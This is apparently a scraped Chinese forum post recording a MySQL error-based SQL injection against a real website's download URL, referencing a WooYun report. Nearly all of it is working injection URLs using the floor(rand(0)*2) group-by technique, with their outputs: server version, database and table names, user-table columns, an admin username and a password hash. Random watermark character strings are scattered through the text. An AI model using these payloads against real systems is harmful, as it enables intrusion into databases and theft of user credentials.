php+mysql高级爆错注入经测算有效

admin

http://www.wooyun.org/bugs/wooyun-2010-01666
% g+ H; z* ?! {& D! V- {' ~
之前想找个测试 没想到这有 可以测试下做个记录而已
& r- {: m; ?  [& Y: c
9 m4 I+ l" {+ L3 P- _( M9 T( \http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003

/data0/htdocs/leqi_new/app/myapp.php
6 Z. P& ?9 l: a8 t4 y% ?
或者
8 s4 G$ ^3 t" ^2 Z
3 t* ]$ c) s# X7 \3 L3 s7 s7 m/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& P* I; z! I( ]+ Y% B
/**********user()**********/  
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

' h; Q# I' J/ H3 O* ?6 q/**********database()**********/  leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

- W1 u3 J: R0 [4 ~/**********limit依次递归爆库**********/
3 x: q2 u7 e' xhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
7 P% @  f3 m5 z1 C5 a* M  Einformation_schema
, |$ g: X% e8 r) l; I, Ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
) P* Z' i$ A# F! v: A; f$ _leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. \8 b2 N# k" \1 c! l( d$ k* [0 D9 K7 I2 Vtest

8 M% t8 ]- Q- Y! R6 g. o. P/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users
- x  _% R% y# x' O4 d8 Q
/**********limit依次递归爆字段名**********/
) h! f8 R9 L4 u1 J3 }: |* ^( Chttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
. {, X  l! a5 a! C7 ]9 [; Ohttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
/wapc/5000_0005_003
11 21
( d. L8 P+ D0 [http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
! ~' v% a2 Z; P6 X0 W& x: _% D' w/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
% X( M/ H' I1 U( Whttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
& C0 V. ]4 ~9 A7 @( R7 }6 Q3 J! L8 Dadmin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
; j* ^1 \& \! ]. D; R

4 H& y6 c( ]" V7 ?